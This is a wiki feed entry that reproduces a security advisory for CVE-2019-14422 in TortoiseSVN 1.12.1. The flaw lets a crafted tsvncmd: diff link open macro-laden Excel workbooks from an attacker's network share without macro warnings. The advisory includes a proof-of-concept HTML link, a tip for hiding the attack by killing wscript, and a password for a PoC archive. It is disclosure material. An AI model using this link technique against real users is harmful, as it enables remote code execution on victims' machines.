<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-14422_TortoiseSVN_1.12.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-14422 TortoiseSVN 1.12.1 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-14422_TortoiseSVN_1.12.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-14422_TortoiseSVN_1.12.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T21:30:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-14422_TortoiseSVN_1.12.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2006&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability   References (Source): ==================== https://www.vulnerability-l...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-14422_TortoiseSVN_1.12.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2006&amp;oldid=prev"/>
		<updated>2021-05-02T04:26:28Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability   References (Source): ==================== https://www.vulnerability-l...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Document Title:&lt;br /&gt;
===============&lt;br /&gt;
TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
References (Source):&lt;br /&gt;
====================&lt;br /&gt;
https://www.vulnerability-lab.com/get_content.php?id=2188&lt;br /&gt;
&lt;br /&gt;
Product:&lt;br /&gt;
https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/&lt;br /&gt;
&lt;br /&gt;
Ticket: https://groups.google.com/forum/#!forum/tortoisesvn&lt;br /&gt;
&lt;br /&gt;
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422&lt;br /&gt;
&lt;br /&gt;
CVE-ID:&lt;br /&gt;
=======&lt;br /&gt;
CVE-2019-14422&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Release Date:&lt;br /&gt;
=============&lt;br /&gt;
2019-08-13&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerability Laboratory ID (VL-ID):&lt;br /&gt;
====================================&lt;br /&gt;
2188&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Common Vulnerability Scoring System:&lt;br /&gt;
====================================&lt;br /&gt;
8.8&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerability Class:&lt;br /&gt;
====================&lt;br /&gt;
Code Execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Current Estimated Price:&lt;br /&gt;
========================&lt;br /&gt;
4.000€ - 5.000€&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Product &amp;amp; Service Introduction:&lt;br /&gt;
===============================&lt;br /&gt;
TortoiseSVN is a really easy to use Revision control / version control /&lt;br /&gt;
source control software for Windows.&lt;br /&gt;
It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and&lt;br /&gt;
easy user interface for Subversion.&lt;br /&gt;
It is developed under the GPL. Which means it is completely free for&lt;br /&gt;
anyone to use, including in a commercial&lt;br /&gt;
environment, without any restriction. The source code is also freely&lt;br /&gt;
available, so you can even develop your&lt;br /&gt;
own version if you wish to. Since it's not an integration for a specific&lt;br /&gt;
IDE like Visual Studio, Eclipse or&lt;br /&gt;
others, you can use it with whatever development tools you like, and&lt;br /&gt;
with any type of file.&lt;br /&gt;
&lt;br /&gt;
(Copy of the about page: https://tortoisesvn.net/about.html )&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Abstract Advisory Information:&lt;br /&gt;
==============================&lt;br /&gt;
A vulnerability laboratory researcher (vxrl team) discovered a remote&lt;br /&gt;
code execution vulnerability in the TortoiseSVN v1.12.1 software.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerability Disclosure Timeline:&lt;br /&gt;
==================================&lt;br /&gt;
2019-08-13: Public Disclosure (Vulnerability Laboratory)&lt;br /&gt;
&lt;br /&gt;
Affected Product(s):&lt;br /&gt;
====================&lt;br /&gt;
TortoiseSVN&lt;br /&gt;
Product: TortoiseSVN - Software 1.12.1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Discovery Status:&lt;br /&gt;
=================&lt;br /&gt;
Published&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Exploitation Technique:&lt;br /&gt;
=======================&lt;br /&gt;
Remote&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Severity Level:&lt;br /&gt;
===============&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Authentication Type:&lt;br /&gt;
====================&lt;br /&gt;
Pre auth - no privileges&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
User Interaction:&lt;br /&gt;
=================&lt;br /&gt;
Low User Interaction&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disclosure Type:&lt;br /&gt;
================&lt;br /&gt;
Independent Security Research&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Technical Details &amp;amp; Description:&lt;br /&gt;
================================&lt;br /&gt;
A remote code execution vulnerability has been uncovered in the official&lt;br /&gt;
TortoiseSVN v1.12.1 software.&lt;br /&gt;
The vulnerability typ allows remote attackers to execute arbitrary codes&lt;br /&gt;
to compromise a target computer system.&lt;br /&gt;
&lt;br /&gt;
The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff&lt;br /&gt;
operation on Excel workbooks, which could be used to open remote&lt;br /&gt;
workbooks without protection from macro security settings to execute&lt;br /&gt;
arbitrary code.&lt;br /&gt;
&lt;br /&gt;
The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a&lt;br /&gt;
customised diff on [file1] and [file2] based on the file extension.&lt;br /&gt;
For xls files, it will execute the script `diff-xls.js` using wscript,&lt;br /&gt;
which will open the two files for analysis without any macro&lt;br /&gt;
security warning. An attacker can exploit this by putting a macro virus&lt;br /&gt;
in a network drive, and force the victim to open the workbooks&lt;br /&gt;
and execute the macro inside. Since the macro is triggered through&lt;br /&gt;
wscript, to make the attack less visible, one could kill the wscript&lt;br /&gt;
process and quit the excel program after the code was executed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Proof of Concept (PoC):&lt;br /&gt;
=======================&lt;br /&gt;
The vulnerability could be triggered by visiting a specially crafted URL&lt;br /&gt;
via web browser.&lt;br /&gt;
To reproduce the vulnerability, one could simply create a .url file or&lt;br /&gt;
open the URL with a browsers,&lt;br /&gt;
but a notification prompt may be shown for the latter case.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;a&lt;br /&gt;
href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'&amp;gt;Checkout&lt;br /&gt;
the Repo with TortoiseSVN&amp;lt;/a&amp;gt;&lt;br /&gt;
&lt;br /&gt;
where VBoxSvrv is the remote network drive controlled by the attacker,&lt;br /&gt;
v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.&lt;br /&gt;
&lt;br /&gt;
Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar&lt;br /&gt;
Password: 23vxrl23&lt;br /&gt;
&lt;br /&gt;
PoC: Video&lt;br /&gt;
https://www.youtube.com/watch?v=spvRSC377vI&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Security Risk:&lt;br /&gt;
==============&lt;br /&gt;
The security risk of the remote code execution vulnerability in the&lt;br /&gt;
software component is estimated as high.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Credits &amp;amp; Authors:&lt;br /&gt;
==================&lt;br /&gt;
PingFanZettaKe [VXRL Team] -&lt;br /&gt;
https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disclaimer &amp;amp; Information:&lt;br /&gt;
=========================&lt;br /&gt;
The information provided in this advisory is provided as it is without&lt;br /&gt;
any warranty. Vulnerability Lab disclaims all warranties,&lt;br /&gt;
either expressed or implied, including the warranties of merchantability&lt;br /&gt;
and capability for a particular purpose. Vulnerability-Lab&lt;br /&gt;
or its suppliers are not liable in any case of damage, including direct,&lt;br /&gt;
indirect, incidental, consequential loss of business profits&lt;br /&gt;
or special damages, even if Vulnerability-Lab or its suppliers have been&lt;br /&gt;
advised of the possibility of such damages. Some states do&lt;br /&gt;
not allow the exclusion or limitation of liability for consequential or&lt;br /&gt;
incidental damages so the foregoing limitation may not apply.&lt;br /&gt;
We do not approve or encourage anybody to break any licenses, policies,&lt;br /&gt;
deface websites, hack into databases or trade with stolen data.&lt;br /&gt;
&lt;br /&gt;
Domains:    www.vulnerability-lab.com		www.vuln-lab.com			&lt;br /&gt;
www.vulnerability-db.com&lt;br /&gt;
Services:   magazine.vulnerability-lab.com&lt;br /&gt;
paste.vulnerability-db.com 			infosec.vulnerability-db.com&lt;br /&gt;
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		&lt;br /&gt;
youtube.com/user/vulnerability0lab&lt;br /&gt;
Feeds:	    vulnerability-lab.com/rss/rss.php&lt;br /&gt;
vulnerability-lab.com/rss/rss_upcoming.php&lt;br /&gt;
vulnerability-lab.com/rss/rss_news.php&lt;br /&gt;
Programs:   vulnerability-lab.com/submit.php&lt;br /&gt;
vulnerability-lab.com/register.php&lt;br /&gt;
vulnerability-lab.com/list-of-bug-bounty-programs.php&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>